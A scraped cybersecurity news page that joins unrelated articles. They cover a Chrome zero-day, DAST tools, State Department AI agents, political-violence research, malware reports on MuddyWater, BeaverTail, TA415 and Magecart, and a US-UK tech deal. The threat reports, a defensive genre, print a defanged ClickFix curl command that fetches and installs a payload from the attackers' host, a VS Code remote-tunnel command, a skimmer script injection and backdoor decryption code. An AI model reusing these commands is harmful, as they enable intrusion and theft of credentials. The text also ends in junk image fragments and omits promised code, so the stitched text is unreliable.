Google has released an urgent security update for Chrome browser users worldwide, addressing four critical vulnerabilities, including one zero-day exploit that is currently being actively exploited in the wild. The company is urging all users to update their browsers immediately to protect against potential attacks. Critical Zero-Day Vulnerability Discovered The most concerning vulnerability in this […]
Dynamic Application Security Testing (DAST) platforms have become fundamental for safeguarding web applications as digital assets and attack surfaces scale in both size and complexity.
The modern DAST landscape is shaped by increased API adoption, rapid deployment cycles, and the rise of AI-driven vulnerabilities, making 2025 a turning point for intelligent, automated security solutions.
This article presents a comprehensive and SEO-optimized review of the top 10 DAST platforms for 2025, featuring technical evaluation, clear pros and cons, and direct comparison.
Web application threats have evolved significantly, with the majority of breaches today resulting from vulnerabilities in running code exposed by dynamic user interactions and APIs.
DAST platforms are uniquely suited to identify these runtime weaknesses, deliver actionable insights for remediation, and verify security postures across modern environments.
Why Dynamic Application Security Testing (DAST) Platforms In 2025
The explosion of cloud-native apps, APIs, and AI services means threats are no longer static new vulnerabilities and misconfigurations rapidly emerge during runtime.
DAST platforms merge automated, continuous scanning, smart integrations, and threat intelligence, making them indispensable for organizations prioritizing uninterrupted development, regulatory compliance, and risk reduction.
In 2025, leading tools leverage AI, predictive analytics, and continuous monitoring for superior protection, supporting both traditional web architectures and API-first, microservices environments.
Comparison Table: Dynamic Application Security Testing (DAST) Platforms In 2025
Its proof-based scanning technology ensures exploitability confirmation with industry-leading accuracy, drastically reducing false positives and accelerating remediation.
AI-powered features surface complex vulnerabilities and prioritize actionable risks through predictive scoring and in-depth technical reports.
Integration with over 50 developer tools makes Invicti seamless across CI/CD and development pipelines. Native IAST and full API testing covering REST, SOAP, GraphQL, and gRPC ensure coverage of modern architectures.
The platform merges DAST, API Security, SCA, and ASPM, providing unified risk insights in real time.
Invicti is ideal for large organizations needing scale, compliance-driven workflows, and measurable security outcomes.
Specifications
Invicti supports automated scanning at scale and integrates natively with developer toolchains, CI/CD platforms, and ticketing systems.
The engine offers predictive risk modeling, technical remediation guidance, and role-based access management for compliance and large teams.
Scanning covers single-page apps, advanced login mechanisms, and hidden API endpoints.
Invicti achieves 99.98% vulnerability validation using its proprietary scanner, and is upgradable to include SAST/SCA modules from Mend.io for complete AppSec management.
Reason to Buy
Organizations benefit from Invicti’s proof-based results, comprehensive reporting, and regulatory compliance support.
AI-enhanced vulnerability detection addresses real-world and emerging threats, minimizing manual overhead for AppSec teams.
Extensive integrations streamline security testing into SDLC workflows, and multi-policy scanning enables tailored risk management across complex environments.
Acunetix delivers powerful DAST and IAST capabilities optimized for SMBs and mid-market organizations needing reliable, granular vulnerability detection.
Its focus on deep web scanning includes advanced crawling and proof-based findings, reducing false positives and supporting compliance programs.
The platform is approachable for mid-sized teams, blending automation with fine-tuned scanning logic suitable for both simple and complex web apps.
Integration options allow Acunetix to fit seamlessly into CI/CD pipelines, while its detailed reports help expedite remediation and compliance documentation.
Comprehensive training resources and technical support are available for onboarding and skill development.
Specifications
Acunetix utilizes dynamic and interactive scanning engines to analyze live web apps, APIs, and password-protected or multi-page forms.
It includes automated vulnerability management, compliance-ready reporting, and CI/CD integration support. The pricing model supports SMB adoption.
Its AcuSensor feature provides IAST-like insights identifying more vulnerabilities inside runtime environments compared to pure black-box scanners.
Reason to Buy
With proof-based validation and extensive vulnerability coverage, Acunetix efficiently meets compliance and remediation needs for organizations that want certainty in their app security.
The platform balances configuration granularity with usability, making accurate testing readily accessible for teams without extensive security expertise.
Features
Automated scanning, IAST-style proof agent, advanced crawl and API discovery, compliance reporting, customizable dashboard, CI/CD and ticketing integration, and support for OpenAPI3, Swagger2, and RAML APIs.
Pros
Intuitive interface and strong reporting
Granular scanning for complex web technologies
Good value for SMBs
Compliance-specific scan modules
Cons
Multi-domain apps require separate configs
Limited AI and automation depth compared to enterprise platforms
Best For: SMBs, compliance-driven programs, technical security analysts
Burp Suite DAST provides scalable enterprise scanning, reputable for minimizing false positives and maximizing operational efficiency across complex portfolios.
Automation capabilities extend from basic web scanning to continuous and out-of-band testing, targeting web apps, APIs, and advanced login flows.
Burp’s deep integration into CI/CD and reporting tools supports DevSecOps, and its role-based access model makes it a fit for organizations scaling development and security teams.
The platform is well-recognized for flexibility, scheduling, and bulk scan operation.
Specifications
Server-deployed, accessed via a web interface and REST API, Burp Suite DAST supports extreme scalability and multi-user management.
Automated scanning modules are configurable for target navigation and privileged areas, including SPAs and API endpoints with OpenAPI, Swagger, and Postman support.
Advanced scan modes balance depth and speed, with scalable parallel scans across portfolios.
Reason to Buy
Burp Suite DAST is a top choice for automated, scheduled scanning needs while delivering robust reporting, compliance, and CI/CD-friendly integration for web application teams.
Organizations benefit from broad portfolio coverage and operational flexibility.
Features
Automated and scalable scanning, API scanning, advanced browser navigation, continuous schedule, CI/CD integration, OAST capabilities, and customizable reporting with broad format support.
Pros
Highly scalable architecture
Bulk scheduling and automation
Deep API and SPA scan support
Industry low false positives
Cons
Steeper learning curve for initial setup
Separate licensing needed for some features
Best For: Enterprise teams, DevSecOps environments, high-volume scanning
Checkmarx offers a unified security testing experience with effortless setup and actionable insights, making it suitable for both developer-centric and compliance-driven security teams.
The platform’s integration with AI and ASPM ensures ongoing risk prioritization and the ability to streamline scans into CI/CD pipelines.
Comprehensive API security and advanced authentication flows set Checkmarx apart for organizations dealing with interconnected web applications.
The streamlined interface expedites onboarding, offering immediate value through automated configuration and clear vulnerability mapping.
Specifications
Checkmarx DAST supports real-time analysis, full SDLC integration, browser-based and automated authentication, API security scanning (REST, SOAP, gRPC), and risk-based vulnerability scoring.
Compliance mapping and detailed reporting make it suitable for regulated industries.
Reason to Buy
Organizations seeking actionable, risk-based insights benefit from Checkmarx’s ability to prioritize and automate discovery and remediation, blending coverage with operational simplicity.
Rapid7 InsightAppSec reimagines vulnerability management for hybrid and AI-powered applications, integrating threat intelligence with exposure command for context-rich remediation.
New features include advanced LLM scanning for AI-powered threats, developer-centric reporting, and seamless cloud-to-code visibility.
Automated pre-production testing extends coverage to internal web apps on closed networks for organizations needing layered security assurance.
Specifications
Rapid7 provides black-box testing and universal translation for modern web, mobile, and cloud APIs.
The platform supports advanced dashboard customization, SOAR integration, and context-driven risk scoring. LLM-specific test modules address prompt injection and AI app risks.
Reason to Buy
Organizations deploying both legacy and GenAI-based applications benefit from Rapid7’s focus on new attack surfaces and intelligent remediation workflows that reduce operational overhead
Veracode’s cloud-native platform stands out for rapid onboarding, automated scanning, and actionable results with industry-low false positive rates.
Real-time feedback, flexible scheduling, and granular scan management are ideal for companies needing both depth and scale in their security program.
The unified dashboard visualizes AppSec status and remediation priorities across dynamic assets and APIs. Integrations allow for continuous security throughout development and deployment.
Specifications
Automated DAST and API scanning, multi-environment support, AI-based login script creation, centralized risk dashboard, and compliance reporting.
Platform scales from single web apps to hundreds of assets across internal and external environments.
Reason to Buy
Speed, scalability, and <5% false positive rates make Veracode a reliable choice for security teams needing trusted, automated protection and actionable remediation insights.
OpenText Fortify DAST merges in-depth web application scanning with event-based macro recording and advanced multi-policy scans, suitable for organizations needing flexibility and precision.
Its intelligent engines customize attacks based on app structure, offering real-time audit and crawl logic.
Composite settings allow for tailored configurations, marrying traditional and AI-driven assessment across service-oriented architectures.
Specifications
Supports composite scan settings, multi-policy scanning, modern authentication flows, expanded gRPC and OpenAPI/YAML API coverage, customizable reporting, and event-driven macro recorder.
Reason to Buy
OpenText Fortify’s flexible configuration, advanced multi-service and API scanning, and compliance reporting make it indispensable for teams handling complex or regulated environments.
Features
Macro recording, gRPC/REST/SOAP API scan, event-driven configuration, composite scan settings, customizable user agents, multi-format reporting.
Pros
Versatile scan configurations
Supports advanced authentication workflows
Comprehensive vulnerability database
Detailed remediation and prevention guidance
Cons
Complex configuration for new users
Premium support required for custom setups
Best For: Regulated sectors, APIs, organizations with complex authentication needs
Intruder delivers automated attack surface management and DAST scanning focusing on simplicity, continuous monitoring, and deep integration with DevOps and issue trackers.
Combining commercial and open-source engines, it efficiently identifies known vulnerabilities and configuration weaknesses for SMBs and lean security teams.
Specifications
Cloud-based, easy-to-configure, integrates with CI/CD and ticketing systems, and offers continuous asset monitoring. Supports authenticated and unauthenticated web app scanning.
Reason to Buy
Intruder’s straightforward setup, automated vulnerability scanning, and prioritization make it ideal for smaller organizations or those seeking low-overhead security management.
Astra Security blends automated vulnerability scanning with manual pentesting and AI-first defensive strategies, providing a 360° view of security posture and continuous proactive insights.
The platform supports more than 10,000 security checks per scan and targets known vulnerabilities as well as custom exploits.
Specifications
Intelligent scanner, manual pentest augmentation, real-time reporting, and compliance-driven scan options. Designed to simplify findings interpretation and empower both security experts and business users.
Reason to Buy
Astra Security simplifies security for organizations needing actionable, interpretable results and manual expert guidance on top of automated DAST scanning.
Aikido Security unifies SAST and DAST scanning, offering developer-friendly, context-aware vulnerability identification and AI-powered autofix features.
It’s designed for “no-nonsense security” that integrates directly with developer workflows (CI/CD, IDEs, GitHub, Slack) and provides one-click remediation for typical findings.
Automated API discovery, authenticated scans, and actionable advice distinguish the platform for collaborative security teams.
Developer-centric organizations benefit from real-time feedback as part of daily workflows, AI-generated fixes, and high accessibility for both lean and enterprise teams.
Choosing the best DAST platform in 2025 means balancing automation, integration, API and cloud coverage, proof-based validation, and AI-driven insights for sustainable web security.
Invicti, Acunetix, and Burp Suite deliver enterprise-grade automation and accuracy; Checkmarx and Veracode excel in unified, API-ready workflows; Rapid7 and Fortify add compliance and risk intelligence; Intruder, Astra, and Aikido provide agile, developer-friendly experiences for lean teams.
As attack surfaces expand, these platforms deliver essential protection for organizations of any scale and digital maturity.
Google has released an emergency security update for its Chrome web browser to address a high-severity zero-day vulnerability that is being actively exploited in the wild.
Users are strongly urged to update their browsers immediately to protect against potential attacks. The vulnerability, tracked as CVE-2025-10585, is the latest in a series of zero-days discovered and patched in Chrome this year.
The new stable channel version has been updated to 140.0.7339.185/.186 for Windows and Mac, and 140.0.7339.185 for Linux.
Google has stated that the update will be rolling out to all users over the coming days and weeks. To mitigate the immediate threat, users should manually trigger the update process to ensure they are protected.
Zero-Day Vulnerability Exploited
The actively exploited vulnerability, CVE-2025-10585, is a Type Confusion flaw in the V8 JavaScript and WebAssembly engine.
Type confusion bugs occur when a program allocates a resource or object using one type but later accesses it with a different, incompatible type. This can lead to logical errors, memory corruption, and ultimately, arbitrary code execution.
A successful exploit could allow a remote attacker to escape the browser’s security sandbox by tricking a user into visiting a specially crafted, malicious webpage.
The vulnerability was reported on September 16, 2025, by Google’s own Threat Analysis Group (TAG), which typically finds zero-days being used in targeted attacks by sophisticated threat actors.
Other Vulnerabilities
In addition to the zero-day, this security update addresses three other high-severity vulnerabilities discovered by external security researchers.
The first, CVE-2025-10500, is a use-after-free vulnerability in Dawn, a graphics abstraction layer. The second, CVE-2025-10501, is also a use-after-free flaw, found in the WebRTC component, which enables real-time communication.
The third vulnerability, CVE-2025-10502, is a heap buffer overflow in ANGLE, a graphics engine translation layer. Use-after-free and heap overflow vulnerabilities can also lead to memory corruption and arbitrary code execution.
Google has awarded bug bounty payments of $15,000 and $10,000 for the discovery of two of these flaws.
Given the confirmation of active exploitation, the risk to unpatched systems is significant. All Google Chrome users on Windows, macOS, and Linux are advised to update their browsers to the latest version without delay.
To check your Chrome version and apply the update, navigate to the “Help” menu and select “About Google Chrome.” The browser will automatically check for and download the latest update, after which a restart will be required to apply the patch.
Google is currently restricting access to the bug details and links related to CVE-2025-10585 to prevent further abuse while the patch is being rolled out to the majority of its user base.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
The State Department wants to have artificial intelligence agents that can take action for employees, the department's chief information officer Kelly Fletcher said Wednesday.
The department already has an enterprise generative-AI chatbot, dubbed StateChat, which it launched last year. That chatbot can help with translations or answer questions from the department's foreign-affairs manual, Fletcher said at an ACT-IAC event Wednesday.
Now the department is looking at “AI agents that will take actions for humans,” said Fletcher. “I want it to not only tell me, ‘How much leave do I have’ … but then I want it to put in my leave slip, which is in a different system. We're building to that.”
That action-taking is what distinguishes AI agents from generative AI. It’s something that the AI company Anthropic, behind large language model Claude, is zeroed in on.
Co-founder Jack Clark said Monday during a D.C forum that, by the end of 2026 or early 2027, Anthropic expects to build systems that “won’t just passively answer questions,” but can “be given tasks that take hours, days or weeks to complete and then go off and do them autonomously.”
Although agentic AI offers the potential to help automate operations and increase productivity, the technology also comes with risks, including oversight challenges, difficulties in testing and evaluation and the potential for job displacement.
The government’s chief information officer, Greg Barbaccia, has said that he wants to use AI to help make up for losses across the federal workforce as the Trump administration has shed thousands of workers. Among them is State's own former chief data officer and AI officer, Matthew Graviss, who left the department in February after over four years working there.
Despite AI's potential, Fletcher said that adoption hasn’t necessarily been easy at State.
The department initially rolled out its chatbot to 3,000 beta testers. Now it is being used by 45,000 to 50,000 of the department’s 80,000 workers, said Fletcher, who noted that “it has taken a huge amount of education and training” to get those users.
“One month ago, I answered the question, ‘Is it allowable for me to use it?'” she said. “Something I wildly underestimated with AI is the amount of training and education and conversation required to get folks who would benefit greatly from it to use it.”
The chatbot can help State employees navigate internal policies.
“If you need to know how to move your cat with you to Conakry,” she offered as an example, the chatbot will show you “all the locations [in State policies] that explain how to move a cat.”
“Then we'll let you click on them and read the actual text or give you a summary,” she said. “The idea here is, in large part, to reduce administrative toil.”
For agents, Fletcher said that her goal is to put the department's administrative functions behind one chatbot and consolidate other potential agents around certain mission sets.
“Looking forward, I think that AI is going to be embedded in just about everything,” said Fletcher, offering the potential for AI to prioritize cybersecurity alerts as an example. State is also testing a chatbot to help users navigate its electronic health record patient portal.
“I think the trick is going to be, 'How do we embed it smartly, and how do we ensure that people know what to use it for?'” she said.
After the Sept. 10, 2025, assassination of conservative political activist Charlie Kirk, President Donald Trump claimed that radical leftist groups foment political violence in the U.S., and “they should be put in jail.”
“The radical left causes tremendous violence,” he said, asserting that “they seem to do it in a bigger way” than groups on the right.
Top presidential adviser Stephen Miller also weighed in after Kirk’s killing, saying that left-wing political organizations constitute “a vast domestic terror movement.”
“We are going to use every resource we have…throughout this government to identify, disrupt, dismantle and destroy these networks and make America safe again,” Miller said.
But policymakers and the public need reliable evidence and actual data to understand the reality of politically motivated violence. From our research on extremism, it’s clear that the president’s and Miller’s assertions about political violence from the left are not based on actual facts.
Based on ourown research and a review of related work, we can confidently say that most domestic terrorists in the U.S. are politically on the right, and right-wing attacks account for the vast majority of fatalities from domestic terrorism.
The understanding of political violence is complicated by differences in definitions and the recent Department of Justice removal of an important government-sponsored study of domestic terrorists.
Political violence in the U.S. has risen in recent months and takes forms that go unrecognized. During the 2024 election cycle, nearly half of all states reported threats against election workers, including social media death threats, intimidation and doxing.
Kirk’s assassination illustrates the growing threat. The man charged with the murder, Tyler Robinson, allegedly planned the attack in writing and online.
This follows other politically motivated killings, including the June assassination of Democratic Minnesota state Rep. and former House Speaker Melissa Hortman and her husband.
These incidents reflect a normalization of political violence. Threats and violence are increasingly treated as acceptable for achieving political goals, posing serious risks to democracy and society.
But different agencies and researchers use different definitions of political violence, making comparisons difficult.
The FBI and Department of Homeland Security define domestic violent extremism as threats involving actual violence. They do not investigate people in the U.S. for constitutionally protected speech, activism or ideological beliefs.
Domestic violent extremism is defined by the FBI and Department of Homeland Security as violence or credible threats of violence intended to influence government policy or intimidate civilians for political or ideological purposes. This general framing, which includes diverse activities under a single category, guides investigations and prosecutions.
Datasets compiled by academic researchers use narrower and more operational definitions. The Global Terrorism Database counts incidents that involve intentional violence with political, social or religious motivation.
These differences mean that the same incident may or may not appear in a dataset, depending on the rules applied.
The FBI and Department of Homeland Security emphasize that these distinctions are not merely academic. Labeling an event “terrorism” rather than a “hate crime” can change who is responsible for investigating an incident and how many resources they have to investigate it.
Right-wing extremist violence has been deadlier than left-wing violence in recent years.
Based ongovernment and independent analyses, right-wing extremist violence has been responsible for the overwhelming majority of fatalities, amounting to approximately 75% to 80% of U.S. domestic terrorism deaths since 2001.
By contrast, left-wing extremist incidents, including those tied to anarchist or environmental movements, have made up about 10& to 15% of incidents and less than 5% of fatalities.
There’s another reason it’s hard to account for and characterize certain kinds of political violence and those who perpetrate it.
The U.S. focuses on prosecuting criminal acts rather than formally designating organizations as terrorist, relying on existing statutes such as conspiracy, weapons violations, RICO provisions and hate crime laws to pursue individuals for specific acts of violence.
The State Department’s Foreign Terrorist Organization list applies only to groups outside of the United States. By contrast, U.S. law bars the government from labeling domestic political organizations as terrorist entities because of First Amendment free speech protections.
Without harmonized reporting and uniform definitions, the data will not provide an accurate overview of political violence in the U.S.
But we can make some important conclusions.
Politically motivated violence in the U.S. is rare compared with overall violent crime. Political violence has a disproportionate impact because even rare incidents can amplify fear, influence policy and deepen societal polarization.
Trump and members of his administration are threatening to target whole organizations and movements and the people who work in them with aggressive legal measures – to jail them or scrutinize their favorable tax status. But research shows that the majority of political violence comes from people following right-wing ideologies.
Since early 2025, cybersecurity teams have observed a marked resurgence in operations attributed to MuddyWater, an Iranian state–sponsored advanced persistent threat (APT) actor.
Emerging initially through broad remote monitoring and management (RMM) exploits, the group has pivoted to highly targeted campaigns employing custom malware backdoors and multi-stage payloads designed to evade detection.
Rather than relying solely on off-the-shelf tools, the adversary has expanded its arsenal to include bespoke implants such as BugSleep, StealthCache, and the Phoenix backdoor.
These components work in concert to establish covert footholds, extract sensitive data, and mask infrastructure using commercial services at scale.
Attack vectors continue to center on spear-phishing emails embedding malicious Microsoft Office documents.
Threat actor profile (Source – Group-IB)
Victims receive decoy documents laced with VBA macros that drop and execute secondary payloads from Cloudflare-protected domains.
Infected hosts then reach out to command-and-control (C2) servers hosted across mainstream and bulletproof providers—ranging from AWS and DigitalOcean to Stark Industries—before shifting communication behind Cloudflare proxies to obscure origin IPs.
Group-IB analysts noted that Cloudflare’s reverse-proxy service dramatically increases the difficulty of tracking active C2 endpoints, as all traffic appears to originate from shared Cloudflare hosts.
Initial loader
Upon execution, the initial loader (commonly named wtsapi32.dll) decrypts and injects the StealthCache backdoor into legitimate processes.
Infection Chain (Source – Group-IB)
StealthCache establishes a pseudo-TLV protocol over HTTPS, sending and receiving encrypted commands at endpoint /aq36 and reporting errors at /q2qq32.
Group-IB analysts identified custom XOR routines that dynamically derive decryption keys from the victim’s device and username strings, thwarting sandbox analysis when executed on mismatched hosts.
In its latest operational phase, MuddyWater’s multi-stage approach has delivered a trio of payloads: an initial VBA dropper, a loader such as Fooder, and a feature-rich backdoor like StealthCache.
Upon receiving a command code, StealthCache executes actions ranging from interactive shells to file exfiltration:
// Decrypt function snippet
void decrypt_payload(uint8_t *buffer, size_t size, const char *key) {
for (size_t i = 0; i < size; ++i) {
buffer[i] ^= key[i % strlen(key)];
}
}
Subsequently, the Phoenix backdoor is deployed from the loader’s memory space. Phoenix registers with its C2 via /register, then periodically posts beacons to /imalive and polls /request for further instructions.
This modular design enables seamless command updates and payload swaps without writing to disk, reinforcing persistence and minimizing forensic artifacts.
By leveraging Cloudflare to mask true server endpoints and integrating dynamic decryption keyed to host identifiers, MuddyWater has crafted a resilient, multi-stage infection chain that remains elusive to network defenders.
Continuous monitoring of Cloudflare-associated domains, alongside vigilant analysis of unique mutex names and C2 URL patterns, is essential for preempting new campaigns and safeguarding critical infrastructure.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free
A sophisticated North Korean nation-state threat actor campaign has emerged, distributing an evolved variant of the BeaverTail malware through deceptive fake hiring platforms and ClickFix social engineering tactics.
This latest campaign, active since May 2025, represents a significant tactical shift as threat actors expand beyond their traditional software developer targets to pursue marketing professionals, cryptocurrency traders, and retail sector personnel.
The malware distribution infrastructure centers around a fraudulent hiring website hosted at businesshire[.]top, masquerading as a legitimate recruitment platform.
The site offers positions including cryptocurrency trader roles at four web3 organizations and sales or marketing roles at three web3 companies and a US-based e-commerce retailer.
When job seekers attempt to record mandatory video responses during the fake application process, they encounter fabricated technical errors requiring them to execute malicious system commands as troubleshooting steps.
GitLab analysts identified this campaign through infrastructure analysis that revealed the threat actor’s backend service hosted at nvidiasdk.fly[.]dev remains active as of publication.
The campaign demonstrates notable operational refinements, including the compilation of BeaverTail into standalone executables rather than relying on JavaScript interpreters, enabling the malware to function on systems without standard development tools typically found on non-technical users’ machines.
The threat actors have implemented sophisticated evasion mechanisms throughout their infrastructure.
The malicious service employs dynamic user agent header verification, responding with legitimate decoy payloads when accessed without specific numeric headers.
For example, requests without proper headers receive archives containing benign VisualBasic scripts and legitimate, signed Nvidia Broadcast executables, while authentic infection attempts using headers like “203” trigger the deployment of actual BeaverTail payloads.
Technical Infection Chain Analysis
The BeaverTail infection mechanism varies significantly across operating systems, demonstrating the threat actor’s technical sophistication and commitment to cross-platform targeting.
Infection chains (Source – GitLab)
On macOS systems, the ClickFix command initiates by downloading a seemingly legitimate installer package named com.nvidiahpc.pkg, which contains no payload data but executes a malicious preinstall script.
This script attempts to exfiltrate stored passwords from the non-standard ~/.myvars file location before downloading additional components from a GitHub repository hosted at /RominaMabelRamirez/dify.
The infection chain proceeds through the execution of downx64.sh, which retrieves two unsigned Mach-O binaries: x64nvidia containing the stripped-down BeaverTail variant, and payuniversal2, a PyInstaller-compiled version of InvisibleFerret.
The malware exhibits intelligent redundancy mechanisms, executing the InvisibleFerret binary only when Python 3 is unavailable at common installation locations or when BeaverTail execution fails to create the expected ~/.npc entry point file within ten seconds.
curl - k - A 204 - o /var/tmp/ nvidia[.]pkg https[:]//nvidiasdk[.]fly[.]dev/nvs && 'sudo' installer - pkg /var/tmp/nvidia[.]pkg - target /
Windows infections follow a different trajectory, with the ClickFix command downloading nvidia.tar.gz containing multiple components including a renamed 7zip executable and a VisualBasic launcher script.
The update.vbs script performs dual functions: extracting password-protected Python dependencies to a hidden .pyp directory using the hardcoded password “ppp,” and launching the primary nvidiasdk[.]exe executable containing the compiled BeaverTail variant.
Linux systems receive the most streamlined infection vector, with malicious scripts delivered directly through wget and piped into bash execution.
The script installs Node.js via the nvm-sh installer before downloading and executing a JavaScript version of BeaverTail functionally identical to the compiled versions deployed on other platforms.
This variant demonstrates reduced complexity compared to previous BeaverTail iterations, targeting only eight browser extensions rather than the typical 22, and omitting dedicated data extraction functions for browsers beyond Chrome.
The simplified codebase reduces overall malware size by approximately one-third while maintaining core credential stealing and cryptocurrency wallet targeting capabilities.
Command and control communications utilize the IP address 172.86.93[.]139 with “tttttt” serving as the campaign identifier across all infected systems.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free
The Chinese state-sponsored threat actor TA415 has evolved its tactics, techniques, and procedures by leveraging legitimate cloud services like Google Sheets and Google Calendar for command and control communications in recent campaigns targeting U.S. government, think tank, and academic organizations.
Throughout July and August 2025, this sophisticated group conducted spearphishing operations using U.S.-China economic-themed lures, masquerading as prominent figures including the current Chair of the Select Committee on Strategic Competition between the United States and the Chinese Communist Party.
TA415, also known as APT41, Brass Typhoon, and Wicked Panda, represents a significant shift in state-sponsored cyber operations by abandoning traditional malware delivery mechanisms in favor of legitimate development tools.
The group’s latest campaigns have consistently utilized trusted services for command and control infrastructure, demonstrating a deliberate strategy to blend malicious activities with normal network traffic patterns.
This approach significantly complicates detection efforts as security tools must distinguish between legitimate business communications and adversarial command channels.
Proofpoint researchers identified that TA415’s recent operations primarily focused on intelligence collection regarding the trajectory of U.S.-China economic relations, aligning with broader geopolitical tensions and ongoing trade negotiations.
The timing of these campaigns coincides with critical policy discussions surrounding U.S.-Taiwan relations and comprehensive sanctions frameworks targeting China, suggesting targeted intelligence requirements from state-level decision makers.
The threat actor’s infection methodology involves delivering password-protected archives through cloud sharing services including Zoho WorkDrive, Dropbox, and OpenDrive.
These archives contain Microsoft Shortcut files alongside hidden components stored within concealed MACOS subfolders.
The group consistently employs Cloudflare WARP VPN services to obscure sender IP addresses during email transmission, adding an additional layer of operational security to their campaigns.
Advanced Infection Chain Analysis
The TA415 infection mechanism demonstrates sophisticated understanding of legitimate development workflows through its deployment of Visual Studio Code Remote Tunnels.
TA415 VS Code Remote Tunnel infection chain (Source – Proofpoint)
Upon execution, the malicious LNK file triggers a batch script named logon.bat, which subsequently launches the WhirlCoil Python loader through an embedded Python package.
This loader exhibits advanced obfuscation techniques using repeated variable and function names like IIIllIIIIlIlIIlIII to evade static analysis detection methods.
The WhirlCoil component downloads the VSCode Command Line Interface from official Microsoft sources, extracts it to %LOCALAPPDATA%\Microsoft\VSCode, and establishes persistence through scheduled tasks named GoogleUpdate, GoogleUpdated, or MicrosoftHealthcareMonitorNode.
The script executes the command code.exe tunnel user login --provider github --name <COMPUTERNAME> to create GitHub-authenticated remote tunnels, providing persistent access without conventional malware signatures.
System information collection includes Windows version details, locale settings, computer identification, username, and domain information, which gets transmitted via POST requests to free request logging services like requestrepo.com.
The exfiltrated data combines with VS Code Remote Tunnel verification codes, enabling threat actors to authenticate remote sessions and execute arbitrary commands through Visual Studio’s integrated terminal interface.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free
The threat landscape for e-commerce websites has once again shifted with the emergence of a sophisticated Magecart-style attack campaign, characterized by the deployment of obfuscated JavaScript to harvest sensitive payment information.
The campaign first came to light in mid-September 2025 following a tweet indicating an ongoing skimming operation, which was later investigated in detail by cybersecurity researcher, Himanshu Anand.
This new episode demonstrates the persistent ingenuity of web skimming groups leveraging client-side injection to target unsuspecting financial transactions at scale.
The attack vectors in question involve the injection of malicious JavaScript, hosted on attacker-controlled domains such as cc-analytics[.]com, into vulnerable checkout pages of compromised e-commerce platforms.
Once inserted, the script seamlessly blends into legitimate payment workflows, hooking into form fields and event listeners to silently exfiltrate payment data.
The initial code observed was heavily obfuscated, designed both to evade detection by security scanners and to frustrate analysis by incident responders.
While the code has been reused across several campaigns, with the malware logic replicated under different domain names such as getnjs[.]com, getvjs[.]com, and utilanalytics[.]com, primarily hosted on infrastructure like IP address 45.61.136.141.
Hosting IP extracted from URLScan transaction logs (Source – Himanshu Anand)
Cybersecurity researcher, Himanshu Anand, noted the malware’s ability to leverage passive DNS and infrastructure fingerprinting to expand its operational reach.
By analyzing public telemetry from sources like URLScan and WHOIS records, Anand was able to map out a constellation of related domains linked to a single cluster of attacker infrastructure.
These pivots revealed more than a dozen active domains, some masquerading as legitimate analytics or utility services, each serving identical or near-identical skimmer payloads.
The Malware’s Infection Mechanism
Central to the success of this Magecart operation is its infection mechanism: a highly automated skimmer script injected via [script src = "https[:]//www[.]cc-analytics[.]com/app[.]js"].
Once active, the code establishes event hooks on payment input fields, such as credit card numbers and billing addresses. When triggered, the script collects stolen credentials and promptly dispatches them to a remote server (pstatics[.]com) using XMLHttpRequest and FormData objects.
The core data exfiltration logic can be described as follows:-
The design ensures that only valid, non-test credentials—those meeting certain length criteria—are transmitted, maximizing the quality and value of stolen data.
This infection pathway is further reinforced by persistent infrastructure, with attackers recycling domain patterns over time.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free
U.S. and U.K. leaders are aiming to formally sign an expansive technology partnership on Thursday as part of President Donald Trump’s state visit with U.K. leadership, according to sources familiar with the planning.
The details of the Tech Prosperity Deal, published on Tuesday, note that three emerging technologies will shape the partnership: artificial intelligence, quantum information sciences and technologies, and nuclear technology. Major U.S. companies — namely NVIDIA, Microsoft, Google, OpenAI and CoreWeave — jointly committed 31 billion British pounds to support the U.K.’s AI infrastructure.
Semiconductor chip manufacturing, quantum computer development and data center development are some of the core investments on which the partnership will focus.
“By teaming-up with world-class companies from both the UK and US, we’re laying the foundations for a future where together we are world leaders in the technology of tomorrow, creating highly skilled jobs, putting more money in people’s pockets and ensuring this partnership benefits every corner of the United Kingdom,” Prime Minister Keir Starmer said in a news release on the deal.
U.K.-based companies are also bringing their capabilities to U.S. initiatives. Oxford Quantum Circuits, a quantum computer company, has installed a quantum computer in New York City, while British semiconductor and software design company Arm Holdings will collaborate with NVIDIA on forming the later companies’ Grace Blackwell chips.
Both countries will also work together to build new nuclear power stations to expedite commercial fusion solutions and assist in the energy demand emerging systems like AI and quantum computing will demand.
“From the UK's perspective, it gets a huge amount of investment to boost its own AI ecosystem, and really it's a massive vote of confidence for that ecosystem and the potential that it has,” Ayesha Bhatti, the head of digital policy for the UK and EU at the Center for Data Innovation told Nextgov/FCW, adding that she, too, had been told the signing would take place Thursday.
Yes.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp){kind=spacer}